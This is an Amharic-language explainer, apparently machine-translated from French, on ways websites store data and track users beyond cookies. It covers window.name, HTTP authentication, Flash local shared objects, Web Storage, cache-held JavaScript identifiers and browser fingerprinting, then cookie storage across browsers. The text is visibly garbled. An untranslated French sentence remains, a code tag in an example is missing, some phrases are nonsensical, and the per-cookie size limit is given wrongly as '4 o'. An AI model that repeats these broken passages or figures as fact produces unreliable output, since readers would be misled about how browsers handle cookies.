ሁሉም የተለመዱ የድር አሳሾች የDOM's window.name ንብረቱን በመጠቀም በጃቫስክሪፕት ብዙ መጠን ያለው ዳታ (ከ2ሜባ እስከ 32ሜባ) ማከማቸት ይችላሉ። ይህ ውሂብ ከክፍለ-ጊዜ ኩኪዎች ይልቅ ጥቅም ላይ ሊውል ይችላል እና እንዲሁም በሁሉም ጎራዎች ውስጥ ጥቅም ላይ ይውላል። ውስብስብ የደንበኛ-ጎን ክፍለ ጊዜ ተለዋዋጮችን ለማከማቸት ቴክኒኩ ከJSON ነገሮች ጋር ሊጣመር ይችላል።
ጉዳቱ እያንዳንዱ የተለየ መስኮት ወይም ትር መጀመሪያ ላይ ባዶ መስኮት ይኖረዋል.ስም; በትሮች ሲሰሱ (በተጠቃሚው የተከፈተ) ይህ ማለት በተናጥል የተከፈቱት ትሮች የመስኮት ስም አይኖራቸውም ማለት ነው። በተጨማሪም window.name በተለያዩ ጣቢያዎች ላይ ያሉ ጎብኚዎችን ለመከታተል ጥቅም ላይ ሊውል ይችላል ይህም የግላዊነት ስጋት ሊሆን ይችላል።
በአንዳንድ መልኩ ይህ ከኩኪዎች የበለጠ ደህንነቱ የተጠበቀ ሊሆን ይችላል, ምክንያቱም በአገልጋዩ አለመሳተፍ ምክንያት, ስለዚህ ለስኒፈር ኩኪዎች የኔትወርክ ጥቃት የማይጋለጥ ያደርገዋል. ነገር ግን ውሂቡን ለመጠበቅ ልዩ እርምጃዎች ከተወሰዱ ውሂቡ በተመሳሳይ መስኮት በተከፈቱ ሌሎች ጣቢያዎች ስለሚገኝ ለተጨማሪ ጥቃቶች የተጋለጠ ነው።
የኤችቲቲፒ ማረጋገጫ
የኤችቲቲፒ ፕሮቶኮል መሰረታዊ የመዳረሻ ማረጋገጫ ፕሮቶኮሎችን እና የመዳረሻ ማረጋገጫ መፍጫውን ያካትታል፣ ይህም ተጠቃሚው የተጠቃሚ ስም እና የይለፍ ቃል ሲሰጥ ብቻ ወደ ድረ-ገጽ መድረስ ያስችላል። እሺ ማለፊያ። አገልጋዩ የድረ-ገጽ መዳረሻን ለመስጠት የምስክር ወረቀት ከጠየቀ አሳሹ ከተጠቃሚው ይጠይቃል እና አንዴ ካገኘ በኋላ አሳሹ ያከማቻል እና በሁሉም ቀጣይ የኤችቲቲፒ ጥያቄዎች ይልካል። ይህ መረጃ ተጠቃሚውን ለመከታተል ሊያገለግል ይችላል።
አካባቢያዊ የተጋራ ነገር
አንድ አሳሽ አዶቤ ፍላሽ ማጫወቻውን ፕለጊን ካካተተ፣ እ.ኤ.አ የአካባቢ የጋራ ዕቃዎች እንደ ኩኪዎች ለተመሳሳይ ዓላማ መጠቀም ይቻላል. ለድር ገንቢዎች ማራኪ ምርጫ ሊሆኑ ይችላሉ ምክንያቱም፡-
- ለአካባቢያዊ የተጋራ ነገር ነባሪ የመጠን ገደብ 100 ኪ.ባ.
- የደህንነት ፍተሻዎች ከተጠቃሚ ኩኪ ፍተሻዎች የተለዩ ናቸው (ስለዚህ ኩኪዎች በማይኖሩበት ጊዜ በአካባቢው ያሉ የተጋሩ ነገሮች ሊፈቀዱ ይችላሉ)።
ይህ የመጨረሻው ነጥብ፣ የኩኪ አስተዳደር ፖሊሲን ከAdobe አካባቢያዊ የተጋሩ ነገሮች የሚለየው። የሚል ጥያቄ ያስነሳል። የግላዊነት ቅንጅቶቹ ተጠቃሚ አስተዳደርን በተመለከተ፡ የኩኪዎች አስተዳደር በአካባቢያዊ የጋራ ዕቃዎች አስተዳደር ላይ ምንም ተጽእኖ እንደሌለው ማወቅ አለበት, እና በተቃራኒው.
ሌላው የዚህ ሥርዓት ትችት መጠቀም የሚቻለው በAdobe ፍላሽ ማጫወቻ ፕለጊን ብቻ ነው በባለቤትነት የተያዘ እንጂ የድር ደረጃ አይደለም።
የደንበኛ-ጎን ጽናት
አንዳንድ የድር አሳሾች በስክሪፕት ላይ የተመሰረተ የፅናት ዘዴን ይደግፋሉ፣ ይህም ገጹ ለበኋላ ጥቅም ላይ እንዲውል በአካባቢው መረጃ እንዲያከማች ያስችለዋል። ኢንተርኔት ኤክስፕሎረር፣ ለምሳሌ በአሳሽ ታሪክ፣ ዕልባቶች፣ በኤክስኤምኤል ውስጥ በተከማቸ ቅርጸት ወይም በቀጥታ በዲስክ ላይ ከተቀመጠው ድረ-ገጽ ጋር የማያቋርጥ መረጃን ይደግፋል። ለማይክሮሶፍት ኢንተርኔት ኤክስፕሎረር 5፣ በዲኤችቲኤምኤል ባህሪያት የሚገኝ የተጠቃሚ-ዳታ ዘዴ አለ።
W3C በኤችቲኤምኤል 5 አዲስ የጃቫ ስክሪፕት ኤፒአይ ለደንበኛ-ጎን የመረጃ ማከማቻ የድር ማከማቻ ተብሎ የሚጠራ እና ኩኪዎችን በቋሚነት ለመተካት አስገብቷል። እሱ ከኩኪዎች ጋር ተመሳሳይ ነው ነገር ግን በከፍተኛ የተሻሻለ አቅም እና በኤችቲቲፒ ጥያቄዎች ራስጌ ውስጥ መረጃን ሳያከማች። ኤፒአይ ሁለት አይነት የድር ማከማቻዎችን ይፈቅዳል፡ የአካባቢ ማከማቻ እና የክፍለ-ጊዜ ማከማቻ፣ ከቋሚ ኩኪዎች እና የክፍለ-ጊዜ ኩኪዎች (ከዚያ የክፍለ-ጊዜ ኩኪዎች በስተቀር አሳሹ በሚዘጋበት ጊዜ ጊዜው ያበቃል) ክፍለ-ጊዜ ማከማቻ ትሩ ሲዘጋ ጊዜው ያበቃል), በቅደም ተከተል. የድር ማከማቻ በሞዚላ ፋየርፎክስ 3.5፣ Google Chrome 5፣ Apple Safari 4፣ Microsoft Internet Explorer 8 እና Opera 10.50 ይደገፋል።
የተለየ ዘዴ በድረ-ገጾች ውስጥ የጃቫ ስክሪፕት ፕሮግራሞችን በመጠቀም በአሳሽ መሸጎጫ (በማስታወስ ውስጥ ከማደስ ይልቅ) ላይ ይመሰረታል።
ለምሳሌ አንድ ገጽ መለያውን ሊይዝ ይችላል። . La première fois que la page se charge, le programme exemple.js est aussi chargé.
በዚህ ጊዜ ፕሮግራሙ በመሸጎጫ ማህደረ ትውስታ ውስጥ ይቆያል እና የተጎበኘው ገጽ ለሁለተኛ ጊዜ አይጫንም. ስለዚህ፣ ፕሮግራሙ አለምአቀፍ ተለዋዋጭ (ለምሳሌ var id = 3243242;) ከያዘ፣ ይህ መለያ የሚሰራ ሆኖ ይቆያል እና ገጹ እንደገና ከተጫነ በኋላ በሌላ የጃቫ ስክሪፕት ኮድ ጥቅም ላይ ሊውል ይችላል ወይም ፕሮግራሙን የሚያገናኘው ገጽ አንዴ ከተጫነ።
የዚህ ዘዴ ዋነኛው ኪሳራ የጃቫ ስክሪፕት ዓለም አቀፍ ተለዋዋጭ ቋሚ መሆን አለበት, ማለትም እንደ ኩኪ ሊቀየር ወይም ሊሰረዝ አይችልም.
የድር አሳሽ የጣት አሻራ
የአሳሽ አሻራ ለመለያ ዓላማ ስለ አሳሹ ውቅር ቅንጅቶች የተሰበሰበ መረጃ ነው። እነዚህ የጣት አሻራዎች ኩኪዎች ቢሰናከሉም እንኳ የኢንተርኔት ተጠቃሚን ወይም መሣሪያን ሙሉ በሙሉ ወይም በከፊል ለመለየት ጥቅም ላይ ሊውሉ ይችላሉ።
የሰውን ድረ-ገጽ ትራፊክ በትክክል ለመለካት እና የተለያዩ የጠቅ ማጭበርበሮችን ለመለየት ሲባል መሰረታዊ የድር አሳሽ ውቅረት መረጃ በድረ-ገጽ ታዳሚ አገልግሎቶች ለረጅም ጊዜ ተሰብስቧል። በደንበኛ-ጎን ስክሪፕት ቋንቋዎች እገዛ፣ የበለጠ ትክክለኛ መረጃ መሰብሰብ ነው። አሁን ይቻላል.
ይህንን መረጃ ወደ ትንሽ ሕብረቁምፊ መቀየር የመሳሪያ አሻራ ያዘጋጃል. እ.ኤ.አ. በ 2010 ኤሌክትሮኒክ ፍሮንትየር ፋውንዴሽን (ኢኤፍኤፍ) የአሳሹን አሻራ ኢንትሮፒ ቢያንስ ለካ። 18,1 ቢት, እና ያ በሸራ የጣት አሻራ ላይ የተደረጉ እድገቶች ወደዚያ ኢንትሮፒ 5,7 ቢት ከመጨመሩ በፊት ነበር።
ኩኪዎች በአጭሩ
ኩኪዎች በድረ-ገጽ ጎብኝ ሃርድ ድራይቭ ላይ በድር አሳሽ የተከማቹ እና ስለጎብኚው መረጃ ለመቅዳት ወይም በድረ-ገጹ ውስጥ ስላደረጉት ጉዞ (ከሌሎች ነገሮች በተጨማሪ) የሚቀመጡ ትንንሽ የጽሁፍ ፋይሎች ናቸው። የድር አስተዳዳሪው ስለዚህ የጎብኝን ልማዶች ማወቅ እና የጣቢያውን አቀራረብ ለእያንዳንዱ ጎብኚ ማበጀት ይችላል። ኩኪዎች በመነሻ ገጹ ላይ ምን ያህል ጽሑፎች እንደሚታዩ ለማስታወስ አልፎ ተርፎም ለማንኛውም የግል አካል የመግቢያ ምስክርነቶችን ለማቆየት ጎብኚው ወደ ጣቢያው ሲመለስ ስሙን እና የይለፍ ቃሉን መተየብ አስፈላጊ አይሆንም. እነሱ ወዲያውኑ በኩኪው ውስጥ ስለሚነበቡ ይወቁ።
አንድ ኩኪ በጣቢያው ዲዛይነር የተቀመጠ የተወሰነ የህይወት ዘመን አለው። እንዲሁም በጣቢያው ላይ ባለው ክፍለ ጊዜ መጨረሻ ላይ ጊዜያቸው ሊያልፍ ይችላል, ይህም ከአሳሹ መዘጋት ጋር ይዛመዳል. ኩኪዎች ህይወትን ለጎብኚዎች ቀላል ለማድረግ እና የበለጠ ተዛማጅ መረጃዎችን ለማቅረብ በሰፊው ጥቅም ላይ ይውላሉ. ነገር ግን ልዩ ቴክኒኮች ጎብኝን በተለያዩ ድረ-ገጾች ለመከታተል እና በዚህም ስለ ልማዶቹ በጣም ሰፊ መረጃን ለመሰብሰብ እና ለማጣራት ያስችላሉ። ይህ ዘዴ ኩኪዎችን መጠቀም የጎብኝዎችን ግላዊነት የሚጥስ የክትትል ቴክኒክ የሚል ስም ሰጥቶታል፣ይህም በሚያሳዝን ሁኔታ ከቴክኒካል ላልሆኑ ምክንያቶች ጥቅም ላይ በሚውሉበት ጊዜ ወይም የተጠቃሚን ግምት የማያከብር ከሆነ እውነታ ጋር ይዛመዳል። .
ለእነዚህ ህጋዊ ፍርሃቶች ምላሽ ለመስጠት፣ HTML 5 የበለጠ ደህንነቱ የተጠበቀ እና የበለጠ አቅም ያለው፣ ኩኪዎችን የመተካት አላማ ያለው አዲስ የጃቫ ስክሪፕት ኤፒአይ ለደንበኛ-ጎን የመረጃ ማከማቻ የድር ማከማቻ አስተዋውቋል።
የኩኪዎች ማከማቻ
በአንዳንድ አሳሾች, ኩኪ በቀላሉ ሊስተካከል የሚችል ነው, እንደ ኖትፓድ ያለ ቀላል የጽሑፍ አርታዒ እሴቶቹን በእጅ ለመለወጥ በቂ ነው.
በአሳሹ ላይ በመመስረት ኩኪዎች በተለየ መንገድ ይቀመጣሉ-
- Microsoft Internet Explorer እያንዳንዱን ኩኪ በተለየ ፋይል ውስጥ ያስቀምጣል;
- Mozilla Firefox ሁሉንም ኩኪዎቹን በአንድ ፋይል ውስጥ ያስቀምጣል;
- Opera ሁሉንም ኩኪዎቹን በአንድ ፋይል ውስጥ ያስቀምጣቸዋል እና ያመስጥራቸዋል (ከሶፍትዌር አማራጮች በስተቀር እነሱን ማስተካከል አይቻልም);
- አፕል ሳፋሪ ሁሉንም ኩኪዎቹን በአንድ .plist ቅጥያ ፋይል ውስጥ ያስቀምጣል። የሶፍትዌር አማራጮችን ካላለፉ በስተቀር ማሻሻል ይቻላል ነገር ግን በጣም ቀላል አይደለም.
አሳሾች እንዲደግፉ ያስፈልጋል ቢያንስ :
- 300 በአንድ ጊዜ ኩኪዎች;
- 4 o በአንድ ኩኪ;
- በአንድ አስተናጋጅ ወይም ጎራ 20 ኩኪዎች።
